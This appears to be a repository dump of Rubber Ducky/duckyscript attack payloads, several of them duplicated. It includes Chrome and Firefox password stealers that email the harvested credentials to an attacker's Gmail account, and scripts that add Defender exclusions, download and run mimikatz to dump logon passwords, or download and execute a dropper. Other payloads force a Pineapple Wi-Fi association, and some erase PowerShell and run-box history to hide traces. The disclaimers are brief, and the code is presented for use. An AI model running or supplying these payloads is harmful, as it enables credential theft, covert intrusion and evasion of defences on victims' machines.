├── LICENSE ├── Needs Updating ├── Chrome Password Stealer ├── Chrome-Artemis │ ├── README.md │ ├── Script.txt │ ├── chrome1.ps1 │ └── readme.txt ├── Create Wireless Network Association (AUTO CONNECT) PINEAPPLE ├── Dropper with UAC bypass ├── Firefox Stealer ├── Google Passwords │ ├── duckycode.txt │ └── inject.bin ├── Mimikatz Payload ├── Needs Updating │ ├── Chrome Password Stealer │ ├── Create Wireless Network Association (AUTO CONNECT) PINEAPPLE │ ├── Dropper with UAC bypass │ ├── Firefox Stealer │ ├── Mimikatz Payload │ ├── PW stealer mimkatz │ ├── Payload Chrome Password Stealer │ ├── Payload Data Exfiltration Backdoor │ ├── Payload Fast Meterpreter │ ├── Payload Netcat Reverse Shell │ ├── Payload Pinapple Association │ └── auto defacer ├── Netcat-Revershell-NEW │ ├── Netcat-Payload.txt │ └── README.md ├── New Mimikatz Payload │ ├── duckycode.txt │ └── inject.bin ├── PW stealer mimkatz ├── Payload Chrome Password Stealer ├── Payload Data Exfiltration Backdoor ├── Payload Fast Meterpreter ├── Payload Netcat Reverse Shell ├── Payload Pinapple Association ├── WiFi Password Exfiltration │ ├── duckycode.txt │ └── inject.bin ├── Wifi Password Grabber to FTP │ ├── duckycode.txt │ └── inject.bin ├── Wifi-Grab │ ├── README.md │ ├── cactuswhid.txt │ └── duckypayload.txt ├── Windows Password to Email │ ├── duckycode.txt │ ├── inject (1).bin │ └── inject.bin ├── auto defacer └── wifi-grabber-rubberducky │ ├── README.md │ └── wifi_grabber_rubberducky.txt ├── README.md ├── WIP [Powershell] Export Wifi Password WIndows 10 ├── payload.txt └── readme.md ├── WIP. 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If not, see . 649 | 650 | Also add information on how to contact you by electronic and paper mail. 651 | 652 | If the program does terminal interaction, make it output a short 653 | notice like this when it starts in an interactive mode: 654 | 655 | Copyright (C) 656 | This program comes with ABSOLUTELY NO WARRANTY; for details type `show w'. 657 | This is free software, and you are welcome to redistribute it 658 | under certain conditions; type `show c' for details. 659 | 660 | The hypothetical commands `show w' and `show c' should show the appropriate 661 | parts of the General Public License. Of course, your program's commands 662 | might be different; for a GUI interface, you would use an "about box". 663 | 664 | You should also get your employer (if you work as a programmer) or school, 665 | if any, to sign a "copyright disclaimer" for the program, if necessary. 666 | For more information on this, and how to apply and follow the GNU GPL, see 667 | . 668 | 669 | The GNU General Public License does not permit incorporating your program 670 | into proprietary programs. If your program is a subroutine library, you 671 | may consider it more useful to permit linking proprietary applications with 672 | the library. If this is what you want to do, use the GNU Lesser General 673 | Public License instead of this License. But first, please read 674 | . 675 | -------------------------------------------------------------------------------- /Needs Updating/Chrome Password Stealer: -------------------------------------------------------------------------------- 1 | REM Author: Guereak 2 | REM Ducky chrome password stealer for Windows 10 3 | Delay 1000 4 | REM ----------- opens chrome web browser 5 | GUI r 6 | DELAY 500 7 | STRING chrome 8 | DELAY 400 9 | ENTER 10 | DELAY 600 11 | REM ----------- exports passwords into csv file 12 | STRING chrome://settings/passwords 13 | ENTER 14 | DELAY 1000 15 | TAB 16 | DELAY 100 17 | TAB 18 | DELAY 100 19 | TAB 20 | DELAY 100 21 | TAB 22 | DELAY 100 23 | TAB 24 | DELAY 100 25 | TAB 26 | DELAY 100 27 | TAB 28 | DELAY 100 29 | ENTER 30 | DELAY 200 31 | ENTER 32 | DELAY 200 33 | ENTER 34 | DELAY 700 35 | STRING chromepasswords.csv 36 | DELAY 200 37 | ENTER 38 | DELAY 1000 39 | CONTROL W 40 | DELAY 100 41 | REM -------------- sends it by email using powershell 42 | GUI r 43 | DELAY 200 44 | STRING powershell 45 | ENTER 46 | DELAY 500 47 | STRING $SMTPServer = 'smtp.gmail.com' 48 | ENTER 49 | DELAY 100 50 | STRING $SMTPInfo = New-Object Net.Mail.SmtpClient($SmtpServer, 587) 51 | ENTER 52 | DELAY 100 53 | STRING $SMTPInfo.EnableSSL = $true 54 | ENTER 55 | DELAY 100 56 | REM ---Make sure to enable less secure app access to sender's mail here: https://myaccount.google.com/lesssecureapps 57 | STRING $SMTPInfo.Credentials = New-Object System.Net.NetworkCredential('YOUR SENDER EMAIL HERE@gmail.com', 'SENDER'S EMAIL PASSWORD') 58 | ENTER 59 | DELAY 100 60 | STRING $SMTPServer = $E = New-Object System.Net.Mail.MailMessage 61 | ENTER 62 | DELAY 100 63 | STRING $E.From = 'YOUR SENDER EMAIL HERE@gmail.com' 64 | ENTER 65 | DELAY 100 66 | STRING $E.To.Add('RECIEVER'S MAIL@gmail.com') 67 | ENTER 68 | DELAY 100 69 | STRING $E.Subject = $env:UserName 70 | ENTER 71 | DELAY 100 72 | STRING $E.Body = 'Success! The password file is attached!' 73 | ENTER 74 | DELAY 100 75 | STRING $F = 'Documents/chromepasswords.csv' 76 | ENTER 77 | DELAY 100 78 | STRING $E.Attachments.Add($F) 79 | ENTER 80 | DELAY 100 81 | STRING $F = $SMTPInfo.Send($E) 82 | ENTER 83 | DELAY 100 84 | STRING exit 85 | ENTER 86 | -------------------------------------------------------------------------------- /Needs Updating/Chrome-Artemis/README.md: -------------------------------------------------------------------------------- 1 | # Chrome Artemis for Rubber Ducky 2 | 3 | ![Logo](https://i.imgur.com/gX6yvMH.png) 4 | 5 | ### THIS PROJECT IS CANCELED! I MIGHT FIX IT IN THE FUTURE, WHEN I HAVE THE TIME. IN THIS STATE, IT WILL NOT WORK. 6 | 7 | ### For educational purposes only! I am not responsible for anything you do! 8 | 9 | **Chrome Artemis** is a script built for the Ruber Ducky that collects saved passwords from a machine and emails them to your Gmail address! 10 | 11 | What **Chrome Artemis** does: 12 | 13 | - Makes and exception in Windows Denfender 14 | - Downloads the required programs 15 | - Saves passwords to a .txt file 16 | - Email the .txt file to your Gmail account 17 | - Deletes downloaded programs 18 | 19 | You can also: 20 | - Modify the script so it sends the .txt to a server via FTP. 21 | - Anything you really want 22 | 23 | 24 | ## Installation 25 | 26 | - Open the Core folder. 27 | - Edit Chrome.ps1 and follow the comments I've added. 28 | - Upload the Chrome.ps1 to a file sharing service such as AnonFiles. 29 | - Open Script.txt 30 | - Replace "Chrome.ps1 DOWNLOAD LINK HERE" with your MediaFire Download link for Chrome.ps1. Keep the "". 31 | - Save your .txt and encode it for Rubber Ducky. 32 | - Put the encoded .bin on your Ducky! 33 | 34 | You don't need Twin Duck! All files are downloaded from the web. Just modify and encode the **Script.txt** and drop the encoded .bin to your Ducky! 35 | 36 | 37 | ## Usage 38 | 39 | Just plug in the Rubber Ducky and wait. After the script runs, it'll lock the user's screen and delete the downloaded files. 40 | 41 | ## Copyright 42 | [Nejc Pirečnik](https://github.com/nejcpirecnik) Creator 43 | -------------------------------------------------------------------------------- /Needs Updating/Chrome-Artemis/Script.txt: -------------------------------------------------------------------------------- 1 | DELAY 1000 2 | ESCAPE 3 | CONTROL ESCAPE 4 | DELAY 400 5 | STRING powershell 6 | DELAY 400 7 | ENTER 8 | DELAY 1000 9 | STRING start-process PowerShell -verb runas 10 | ENTER 11 | DELAY 1000 12 | LEFT 13 | DELAY 100 14 | ENTER 15 | DELAY 1000 16 | STRING Set-MpPreference -ExclusionPath C:\Users 17 | ENTER 18 | DELAY 500 19 | STRING exit 20 | ENTER 21 | DELAY 100 22 | CONTROL ESCAPE 23 | DELAY 400 24 | STRING powershell 25 | DELAY 400 26 | ENTER 27 | DELAY 1000 28 | STRING (New-Object System.Net.WebClient).DownloadFile("CHROME.PS1 LINK HERE","$env:USERPROFILE\Chrome.ps1") 29 | ENTER 30 | DELAY 2000 31 | STRING ./Chrome.ps1 32 | ENTER 33 | DELAY 5000 34 | STRING del Chrome.ps1 35 | ENTER 36 | DELAY 1000 37 | ALT F4 38 | DELAY 1000 39 | GUI l -------------------------------------------------------------------------------- /Needs Updating/Chrome-Artemis/chrome1.ps1: -------------------------------------------------------------------------------- 1 | $SMTPServer = 'smtp.gmail.com' 2 | $SMTPInfo = New-Object Net.Mail.SmtpClient($SmtpServer, 587) 3 | $SMTPInfo.EnableSsl = $true 4 | $SMTPInfo.Credentials = New-Object System.Net.NetworkCredential('EMAIL_ADDRESS', 'EMAIL_PASSWORD') 5 | $E = New-Object System.Net.Mail.MailMessage 6 | $E.From = 'EMAIL_ADDRESS' 7 | $E.To.Add('EMAIL_ADDRESS') 8 | $E.Subject = $env:UserName 9 | $E.Body = 'Success! The password file is attached!' 10 | $F = "Passwords.txt" 11 | $E.Attachments.Add($F) 12 | $SMTPInfo.Send($E) 13 | exit -------------------------------------------------------------------------------- /Needs Updating/Chrome-Artemis/readme.txt: -------------------------------------------------------------------------------- 1 | CHROME ARTEMIS v3 - Updated 2 | 3 | INFO: I've updated the script since Mediafire keeps on deleting my link. 4 | 5 | Hey! 6 | Thank you for downloading my script :) 7 | If you'd like to support me, you can buy me a coffee here: paypal.me/ganks1lent 8 | 9 | Instructions: 10 | 11 | 1. Edit Chrome.ps1 and follow the comments I've added. 12 | 2. Upload the Chrome.ps1 to a file sharing service such as AnonFiles. 13 | 3. Open Script.txt 14 | 4. Replace "Chrome.ps1 DOWNLOAD LINK HERE" with your link for Chrome.ps1. Keep the "". 15 | 5. Save your .txt and encode it for Rubber Ducky. 16 | 6. Put the encoded .bin on your Ducky! 17 | 18 | This version should work. -------------------------------------------------------------------------------- /Needs Updating/Create Wireless Network Association (AUTO CONNECT) PINEAPPLE: -------------------------------------------------------------------------------- 1 | DEFAULT_DELAY 200 2 | ESC 3 | ESC 4 | REM opens task manager for a distraction 5 | REM tell user you are checking memory or somthing 6 | GUI r 7 | STRING taskmgr 8 | ENTER 9 | ALT SPACE 10 | STRING X 11 | TAB 12 | TAB 13 | TAB 14 | TAB 15 | LEFT 16 | LEFT 17 | REM opens network manager 18 | CTRL ESC 19 | STRING Manage Wireless Networks 20 | ENTER 21 | TAB 22 | TAB 23 | TAB 24 | TAB 25 | ENTER 26 | ENTER 27 | REM creates ap association 28 | STRING I_Love_Pineapples 29 | TAB 30 | DOWN 31 | TAB 32 | SPACE 33 | TAB 34 | SPACE 35 | ENTER 36 | ESC 37 | ALT F4 38 | CTRL ESC 39 | REM reboots for autoconnect to pineapple 40 | GUI r 41 | STRING Shutdown.exe -r -t 00 42 | ENTER 43 | -------------------------------------------------------------------------------- /Needs Updating/Dropper with UAC bypass: -------------------------------------------------------------------------------- 1 | 2 | REM Currently not working.... 3 | 4 | REM Dropper with UAC bypass 5 | REM By Meldramiriel 6 | REM Code credit to I-Am-Jakoby, Mubix, 7 | REM Overkill delay, can be changed 8 | DELAY 2000 9 | GUI r 10 | DELAY 500 11 | REM Starts a powershell console 12 | STRING powershell Start-Process powershell.exe -Verb runAs 13 | ENTER 14 | DELAY 500 15 | REM alt+y accepts UAC dialogue 16 | ALT y 17 | DELAY 750 18 | REM Downloads file and saves it to %temp% as bob.exe, then runs the file, change to fit your script 19 | STRING (New-Object System.Net.Webclient).DownloadFile('http://example.com/bob.old','%temp%\bob.exe'); Start-Process "%temp%\bob.exe" 20 | DELAY 500 21 | GUI r 22 | DELAY 500 23 | REM Cleans up the run box history 24 | STRING reg delete HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRU /va /f 25 | REM clean temp folder "rm $env:TEMP\* -r -Force -ErrorAction SilentlyContinue" 26 | REM delete powershell history "Remove-Item (Get-PSreadlineOption).HistorySavePath" 27 | REM Clear-RecycleBin -Force -ErrorAction SilentlyContinue 28 | REM function for this here https://github.com/I-Am-Jakoby/PowerShell-for-Hackers/blob/main/Functions/Clean-Exfil.md 29 | Enter 30 | Delay 500 31 | 32 | -------------------------------------------------------------------------------- /Needs Updating/Firefox Stealer: -------------------------------------------------------------------------------- 1 | REM Author: @nickgodshall/koufax 2 | REM Rubber Ducky Firefox Password Stealer 3 | REM Target: Windows 10/Firefox V 66.0.2 4 | REM Description: Opens firefox, navigates to prefernces page and screenshots the saved user credentials. Then 5 | REM saves screenshot to public user and emails the screenshot to your email. Written for the Null Byte tutorial 6 | REM Remember to replace all instances of [SENDER EMAIL] [SENDER PASSWORD] and [RECEIVER EMAIL] to their 7 | REM appropriate values 8 | 9 | DELAY 2000 10 | REM ------------- Open Firefox ------------- 11 | GUI r 12 | DELAY 500 13 | STRING firefox 14 | DELAY 1000 15 | ENTER 16 | DELAY 4000 17 | REM ------------- Navigate to preferences page and views passwords ------------- 18 | CTRL L 19 | DELAY 250 20 | STRING about:preferences#privacy 21 | ENTER 22 | DELAY 500 23 | TAB 24 | REPEAT 14 25 | ENTER 26 | DELAY 250 27 | TAB 28 | REPEAT 3 29 | ENTER 30 | DELAY 250 31 | ENTER 32 | DELAY 500 33 | PRINTSCREEN 34 | ALT F4 35 | REM ------------ Save screenshot as png ------------ 36 | DELAY 100 37 | GUI r 38 | DELAY 250 39 | STRING powershell 40 | DELAY 250 41 | ENTER 42 | DELAY 250 43 | STRING $screenshot = gcb -Format Image 44 | ENTER 45 | STRING $path = 'C:\Users\Public\passwords.png' 46 | ENTER 47 | STRING $screenshot.Save($path, 'png') 48 | ENTER 49 | REM ------------Email Screenshot as an Attachment ------------ 50 | REM ------------ Enter email credentials here ------------ 51 | STRING $SMTPServer = 'smtp.gmail.com' 52 | ENTER 53 | STRING $SMTPInfo = New-Object Net.Mail.SmtpClient($SmtpServer, 587) 54 | ENTER 55 | STRING $SMTPInfo.EnableSsl = $true 56 | ENTER 57 | STRING $SMTPInfo.Credentials = New-Object System.Net.NetworkCredential('[SENDER EMAIL]', '[SENDER PASSWORD]'); 58 | ENTER 59 | STRING $ReportEmail = New-Object System.Net.Mail.MailMessage 60 | ENTER 61 | STRING $ReportEmail.From = '[SENDER EMAIL]' 62 | ENTER 63 | STRING $ReportEmail.To.Add('[RECEIVER EMAIL]') 64 | ENTER 65 | STRING $ReportEmail.Subject = 'USER CREDENTIALS' 66 | ENTER 67 | STRING $ReportEmail.Body = 'Here are the usernames I found for you. Quack Quack.' 68 | ENTER 69 | STRING $ReportEmail.Attachments.Add('C:\Users\Public\passwords.png') 70 | ENTER 71 | STRING $SMTPInfo.Send($ReportEmail) 72 | ENTER 73 | DELAY 3000 74 | STRING exit 75 | ENTER 76 | -------------------------------------------------------------------------------- /Needs Updating/Google Passwords/duckycode.txt: -------------------------------------------------------------------------------- 1 | REM Made By Rams3sth3s3c0nd (fixed by kyoceti) 2 | REM "what does it do?" gets all saved google passwords 3 | REM you WILL need twinduck 4 | REM you need WebPassView and a .bat file (rename it "OpenPass") with in it the text: start WebBrowserPassView.exe 5 | REM opens powershell 6 | DELAY 1000 7 | GUI r 8 | DELAY 100 9 | STRING powershell 10 | DELAY 50 11 | ENTER 12 | DELAY 2000 13 | REM ******** 14 | REM navigates to USB drive usb is called DUCKY for me 15 | STRING $usbPath = Get-WMIObject Win32_Volume | ? { $_.Label -eq 'DUCKY' } | select name 16 | DELAY 50 17 | ENTER 18 | DELAY 50 19 | STRING cd $usbPath.name 20 | DELAY 50 21 | ENTER 22 | DELAY 50 23 | REM ***************** 24 | REM opens the .bat script 25 | STRING ./OpenPass.bat 26 | DELAY 2000 27 | REM ****************************** 28 | REM saves the passwords in txt file 29 | CTRL A 30 | DELAY 50 31 | CTRL S 32 | DELAY 50 33 | F4 34 | DELAY 50 35 | CTRL A 36 | DELAY 50 37 | REM ******************************************************* 38 | REM ↓ IMPORTANT: change the "E" to whatever your usb-drive letter is. 39 | STRING E:\ 40 | DELAY 50 41 | ENTER 42 | DELAY 50 43 | ENTER 44 | DELAY 50 45 | ENTER 46 | DELAY 50 47 | STRING PASSWORD 48 | DELAY 50 49 | ENTER 50 | DELAY 1000 51 | ALT F4 52 | DELAY 500 53 | STRING exit 54 | DELAY 50 55 | ENTER 56 | REM ************************************** 57 | REM now check in the usb folder and you will see a .txt folder with all the logged passwords 58 | -------------------------------------------------------------------------------- /Needs Updating/Google Passwords/inject.bin: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Meldramiriel/duckyscript-for-flipperzero/017c1fb6ef3c20526fcc6abe65fe784f013f56fc/Needs Updating/Google Passwords/inject.bin -------------------------------------------------------------------------------- /Needs Updating/Mimikatz Payload: -------------------------------------------------------------------------------- 1 | REM mimikatz ducky script to dump local wdigest passwords from memory using mimikatz (local user needs to be an administrator/have admin privs) 2 | DELAY 3000 3 | CONTROL ESCAPE 4 | DELAY 1000 5 | STRING cmd 6 | DELAY 1000 7 | CTRL-SHIFT ENTER 8 | DELAY 1000 9 | ALT y 10 | DELAY 300 11 | ENTER 12 | STRING powershell (new-object System.Net.WebClient).DownloadFile('http:///mimikatz.exe','%TEMP%\mimikatz.exe') 13 | DELAY 300 14 | ENTER 15 | DELAY 3000 16 | STRING %TEMP%\mimikatz.exe 17 | DELAY 300 18 | ENTER 19 | DELAY 3000 20 | STRING privilege::debug 21 | DELAY 300 22 | ENTER 23 | DELAY 1000 24 | STRING sekurlsa::logonPasswords full 25 | DELAY 300 26 | ENTER 27 | DELAY 1000 28 | STRING exit 29 | DELAY 300 30 | ENTER 31 | DELAY 100 32 | STRING del %TEMP%\mimikatz.exe 33 | DELAY 300 34 | ENTER 35 | -------------------------------------------------------------------------------- /Needs Updating/Needs Updating/Chrome Password Stealer: -------------------------------------------------------------------------------- 1 | REM Author: Guereak 2 | REM Ducky chrome password stealer for Windows 10 3 | Delay 1000 4 | REM ----------- opens chrome web browser 5 | GUI r 6 | DELAY 500 7 | STRING chrome 8 | DELAY 400 9 | ENTER 10 | DELAY 600 11 | REM ----------- exports passwords into csv file 12 | STRING chrome://settings/passwords 13 | ENTER 14 | DELAY 1000 15 | TAB 16 | DELAY 100 17 | TAB 18 | DELAY 100 19 | TAB 20 | DELAY 100 21 | TAB 22 | DELAY 100 23 | TAB 24 | DELAY 100 25 | TAB 26 | DELAY 100 27 | TAB 28 | DELAY 100 29 | ENTER 30 | DELAY 200 31 | ENTER 32 | DELAY 200 33 | ENTER 34 | DELAY 700 35 | STRING chromepasswords.csv 36 | DELAY 200 37 | ENTER 38 | DELAY 1000 39 | CONTROL W 40 | DELAY 100 41 | REM -------------- sends it by email using powershell 42 | GUI r 43 | DELAY 200 44 | STRING powershell 45 | ENTER 46 | DELAY 500 47 | STRING $SMTPServer = 'smtp.gmail.com' 48 | ENTER 49 | DELAY 100 50 | STRING $SMTPInfo = New-Object Net.Mail.SmtpClient($SmtpServer, 587) 51 | ENTER 52 | DELAY 100 53 | STRING $SMTPInfo.EnableSSL = $true 54 | ENTER 55 | DELAY 100 56 | REM ---Make sure to enable less secure app access to sender's mail here: https://myaccount.google.com/lesssecureapps 57 | STRING $SMTPInfo.Credentials = New-Object System.Net.NetworkCredential('YOUR SENDER EMAIL HERE@gmail.com', 'SENDER'S EMAIL PASSWORD') 58 | ENTER 59 | DELAY 100 60 | STRING $SMTPServer = $E = New-Object System.Net.Mail.MailMessage 61 | ENTER 62 | DELAY 100 63 | STRING $E.From = 'YOUR SENDER EMAIL HERE@gmail.com' 64 | ENTER 65 | DELAY 100 66 | STRING $E.To.Add('RECIEVER'S MAIL@gmail.com') 67 | ENTER 68 | DELAY 100 69 | STRING $E.Subject = $env:UserName 70 | ENTER 71 | DELAY 100 72 | STRING $E.Body = 'Success! The password file is attached!' 73 | ENTER 74 | DELAY 100 75 | STRING $F = 'Documents/chromepasswords.csv' 76 | ENTER 77 | DELAY 100 78 | STRING $E.Attachments.Add($F) 79 | ENTER 80 | DELAY 100 81 | STRING $F = $SMTPInfo.Send($E) 82 | ENTER 83 | DELAY 100 84 | STRING exit 85 | ENTER 86 | -------------------------------------------------------------------------------- /Needs Updating/Needs Updating/Create Wireless Network Association (AUTO CONNECT) PINEAPPLE: -------------------------------------------------------------------------------- 1 | DEFAULT_DELAY 200 2 | ESC 3 | ESC 4 | REM opens task manager for a distraction 5 | REM tell user you are checking memory or somthing 6 | GUI r 7 | STRING taskmgr 8 | ENTER 9 | ALT SPACE 10 | STRING X 11 | TAB 12 | TAB 13 | TAB 14 | TAB 15 | LEFT 16 | LEFT 17 | REM opens network manager 18 | CTRL ESC 19 | STRING Manage Wireless Networks 20 | ENTER 21 | TAB 22 | TAB 23 | TAB 24 | TAB 25 | ENTER 26 | ENTER 27 | REM creates ap association 28 | STRING I_Love_Pineapples 29 | TAB 30 | DOWN 31 | TAB 32 | SPACE 33 | TAB 34 | SPACE 35 | ENTER 36 | ESC 37 | ALT F4 38 | CTRL ESC 39 | REM reboots for autoconnect to pineapple 40 | GUI r 41 | STRING Shutdown.exe -r -t 00 42 | ENTER 43 | -------------------------------------------------------------------------------- /Needs Updating/Needs Updating/Dropper with UAC bypass: -------------------------------------------------------------------------------- 1 | 2 | REM Currently not working.... 3 | 4 | REM Dropper with UAC bypass 5 | REM By Meldramiriel 6 | REM Code credit to I-Am-Jakoby, Mubix, 7 | REM Overkill delay, can be changed 8 | DELAY 2000 9 | GUI r 10 | DELAY 500 11 | REM Starts a powershell console 12 | STRING powershell Start-Process powershell.exe -Verb runAs 13 | ENTER 14 | DELAY 500 15 | REM alt+y accepts UAC dialogue 16 | ALT y 17 | DELAY 750 18 | REM Downloads file and saves it to %temp% as bob.exe, then runs the file, change to fit your script 19 | STRING (New-Object System.Net.Webclient).DownloadFile('http://example.com/bob.old','%temp%\bob.exe'); Start-Process "%temp%\bob.exe" 20 | DELAY 500 21 | GUI r 22 | DELAY 500 23 | REM Cleans up the run box history 24 | STRING reg delete HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRU /va /f 25 | REM clean temp folder "rm $env:TEMP\* -r -Force -ErrorAction SilentlyContinue" 26 | REM delete powershell history "Remove-Item (Get-PSreadlineOption).HistorySavePath" 27 | REM Clear-RecycleBin -Force -ErrorAction SilentlyContinue 28 | REM function for this here https://github.com/I-Am-Jakoby/PowerShell-for-Hackers/blob/main/Functions/Clean-Exfil.md 29 | Enter 30 | Delay 500 31 | 32 | -------------------------------------------------------------------------------- /Needs Updating/Needs Updating/Firefox Stealer: -------------------------------------------------------------------------------- 1 | REM Author: @nickgodshall/koufax 2 | REM Rubber Ducky Firefox Password Stealer 3 | REM Target: Windows 10/Firefox V 66.0.2 4 | REM Description: Opens firefox, navigates to prefernces page and screenshots the saved user credentials. Then 5 | REM saves screenshot to public user and emails the screenshot to your email. Written for the Null Byte tutorial 6 | REM Remember to replace all instances of [SENDER EMAIL] [SENDER PASSWORD] and [RECEIVER EMAIL] to their 7 | REM appropriate values 8 | 9 | DELAY 2000 10 | REM ------------- Open Firefox ------------- 11 | GUI r 12 | DELAY 500 13 | STRING firefox 14 | DELAY 1000 15 | ENTER 16 | DELAY 4000 17 | REM ------------- Navigate to preferences page and views passwords ------------- 18 | CTRL L 19 | DELAY 250 20 | STRING about:preferences#privacy 21 | ENTER 22 | DELAY 500 23 | TAB 24 | REPEAT 14 25 | ENTER 26 | DELAY 250 27 | TAB 28 | REPEAT 3 29 | ENTER 30 | DELAY 250 31 | ENTER 32 | DELAY 500 33 | PRINTSCREEN 34 | ALT F4 35 | REM ------------ Save screenshot as png ------------ 36 | DELAY 100 37 | GUI r 38 | DELAY 250 39 | STRING powershell 40 | DELAY 250 41 | ENTER 42 | DELAY 250 43 | STRING $screenshot = gcb -Format Image 44 | ENTER 45 | STRING $path = 'C:\Users\Public\passwords.png' 46 | ENTER 47 | STRING $screenshot.Save($path, 'png') 48 | ENTER 49 | REM ------------Email Screenshot as an Attachment ------------ 50 | REM ------------ Enter email credentials here ------------ 51 | STRING $SMTPServer = 'smtp.gmail.com' 52 | ENTER 53 | STRING $SMTPInfo = New-Object Net.Mail.SmtpClient($SmtpServer, 587) 54 | ENTER 55 | STRING $SMTPInfo.EnableSsl = $true 56 | ENTER 57 | STRING $SMTPInfo.Credentials = New-Object System.Net.NetworkCredential('[SENDER EMAIL]', '[SENDER PASSWORD]'); 58 | ENTER 59 | STRING $ReportEmail = New-Object System.Net.Mail.MailMessage 60 | ENTER 61 | STRING $ReportEmail.From = '[SENDER EMAIL]' 62 | ENTER 63 | STRING $ReportEmail.To.Add('[RECEIVER EMAIL]') 64 | ENTER 65 | STRING $ReportEmail.Subject = 'USER CREDENTIALS' 66 | ENTER 67 | STRING $ReportEmail.Body = 'Here are the usernames I found for you. Quack Quack.' 68 | ENTER 69 | STRING $ReportEmail.Attachments.Add('C:\Users\Public\passwords.png') 70 | ENTER 71 | STRING $SMTPInfo.Send($ReportEmail) 72 | ENTER 73 | DELAY 3000 74 | STRING exit 75 | ENTER 76 | -------------------------------------------------------------------------------- /Needs Updating/Needs Updating/Mimikatz Payload: -------------------------------------------------------------------------------- 1 | REM mimikatz ducky script to dump local wdigest passwords from memory using mimikatz (local user needs to be an administrator/have admin privs) 2 | DELAY 3000 3 | CONTROL ESCAPE 4 | DELAY 1000 5 | STRING cmd 6 | DELAY 1000 7 | CTRL-SHIFT ENTER 8 | DELAY 1000 9 | ALT y 10 | DELAY 300 11 | ENTER 12 | STRING powershell (new-object System.Net.WebClient).DownloadFile('http:///mimikatz.exe','%TEMP%\mimikatz.exe') 13 | DELAY 300 14 | ENTER 15 | DELAY 3000 16 | STRING %TEMP%\mimikatz.exe 17 | DELAY 300 18 | ENTER 19 | DELAY 3000 20 | STRING privilege::debug 21 | DELAY 300 22 | ENTER 23 | DELAY 1000 24 | STRING sekurlsa::logonPasswords full 25 | DELAY 300 26 | ENTER 27 | DELAY 1000 28 | STRING exit 29 | DELAY 300 30 | ENTER 31 | DELAY 100 32 | STRING del %TEMP%\mimikatz.exe 33 | DELAY 300 34 | ENTER 35 | -------------------------------------------------------------------------------- /Needs Updating/Needs Updating/PW stealer mimkatz: -------------------------------------------------------------------------------- 1 | REM Title: windows password grabber 2 | REM Arthor makozort, https://github.com/makozort 3 | REM Target: windows 10 (with admin access), might work with windows 7 idk 4 | REM THIS IS FOR AUTHORISED USE ON MACHINES YOU EITHER OWN OR HAVE BEEN GIVEN ACCESS TO PEN TEST, MAKOZORT IS NO LIABLE FOR ANY MISUSE OF THIS SCRIPT 5 | REM --------------set default delay based on targets computer speed, 350 is around mid range (I think) 6 | DEFAULT_DELAY 350 7 | REM -------------first delay is 1 second (you may need more) to let windows set up the "keyboard" 8 | DELAY 1000 9 | REM disable windows defender, you may have to fiddle with this 10 | CTRL ESC 11 | DELAY 300 12 | STRING windows defender 13 | DELAY 300 14 | ENTER 15 | DELAY 1000 16 | ENTER 17 | TAB 18 | TAB 19 | TAB 20 | TAB 21 | DELAY 300 22 | ENTER 23 | DELAY 600 24 | SPACE 25 | DELAY 600 26 | LEFT 27 | ENTER 28 | DELAY 300 29 | ALT F4 30 | REM ------------open powershell as admin and set an exclusion path in the C:\Users path 31 | GUI r 32 | STRING powershell 33 | CTRL-SHIFT ENTER 34 | DELAY 600 35 | ALT y 36 | STRING Set-MpPreference -ExclusionPath C:\Users 37 | ENTER 38 | STRING exit 39 | ENTER 40 | REM -------------download mimikatz 41 | GUI r 42 | STRING cmd 43 | CTRL-SHIFT ENTER 44 | DELAY 600 45 | ALT y 46 | STRING powershell (new-object System.Net.WebClient).DownloadFile('LINK TO MIMIKATZ.EXE DOWNLOAD HERE','%temp%\pw.exe') 47 | ENTER 48 | REM ------------run the following mimikatz commands and print results in new txt file 49 | DELAY 4000 50 | STRING %TEMP%\pw.exe > c:\pwlog.txt & type pwlog.txt; 51 | ENTER 52 | STRING privilege::debug 53 | ENTER 54 | STRING sekurlsa::logonPasswords full 55 | ENTER 56 | STRING exit 57 | ENTER 58 | REM< --------- delete mimikatz 59 | STRING del %TEMP%\pw.exe 60 | ENTER 61 | STRING exit 62 | ENTER 63 | REM -------------email the pwlog.txt to your email 64 | GUI r 65 | STRING powershell 66 | CTRL-SHIFT ENTER 67 | DELAY 600 68 | ALT y 69 | STRING Remove-MpPreference -ExclusionPath C:\Users 70 | ENTER 71 | STRING $SMTPServer = 'smtp.gmail.com' 72 | ENTER 73 | STRING $SMTPInfo = New-Object Net.Mail.SmtpClient($SmtpServer, 587) 74 | ENTER 75 | STRING $SMTPInfo.EnableSsl = $true 76 | ENTER 77 | STRING $SMTPInfo.Credentials = New-Object System.Net.NetworkCredential('THE-PART-OF-YOUR-EMAIL-BEFORE-THE-@ 78 | SHIFT 2 79 | STRING gmail.com', 'PASSWORDHERE'); 80 | ENTER 81 | STRING $ReportEmail = New-Object System.Net.Mail.MailMessage 82 | ENTER 83 | STRING $ReportEmail.From = 'THE-PART-OF-YOUR-EMAIL-BEFORE-THE-@ 84 | SHIFT 2 85 | STRING gmail.com' 86 | ENTER 87 | STRING $ReportEmail.To.Add('THE-PART-OF-RECEIVERS-EMAIL-BEFORE-THE-@ 88 | SHIFT 2 89 | STRING gmail.com') 90 | ENTER 91 | STRING $ReportEmail.Subject = 'Hello from the ducky' 92 | ENTER 93 | STRING $ReportEmail.Body = 'Attached is your duck report.' 94 | ENTER 95 | STRING $ReportEmail.Attachments.Add('c:\pwlog.txt') 96 | ENTER 97 | STRING $SMTPInfo.Send($ReportEmail) 98 | ENTER 99 | DELAY 4000 100 | STRING exit 101 | ENTER 102 | REM ------cleanup time 103 | GUI r 104 | STRING powershell 105 | CTRL-SHIFT ENTER 106 | DELAY 600 107 | ALT y 108 | REM ----------delete the txt file 109 | STRING del c:\pwlog.txt 110 | ENTER 111 | REM -------remove powershell history (this probably wont be enough to remove all traces of you, this is just to prevent inital investigations 112 | STRING Remove-Item (Get-PSreadlineOption).HistorySavePath 113 | ENTER 114 | STRING exit 115 | ENTER 116 | REM ------lock the pc 117 | GUI 1 118 | -------------------------------------------------------------------------------- /Needs Updating/Needs Updating/Payload Chrome Password Stealer: -------------------------------------------------------------------------------- 1 | REM Author: Nuk3leus 2 | REM Ducky chrome password stealer: 1.0 3 | REM Target: Windows 7 4 | REM Description: Opens chrome, navigates to chrome settings, navigates to saved passwords, searches for facebook, shows password, copys password 5 | REM closes chrome, Opens notepad with 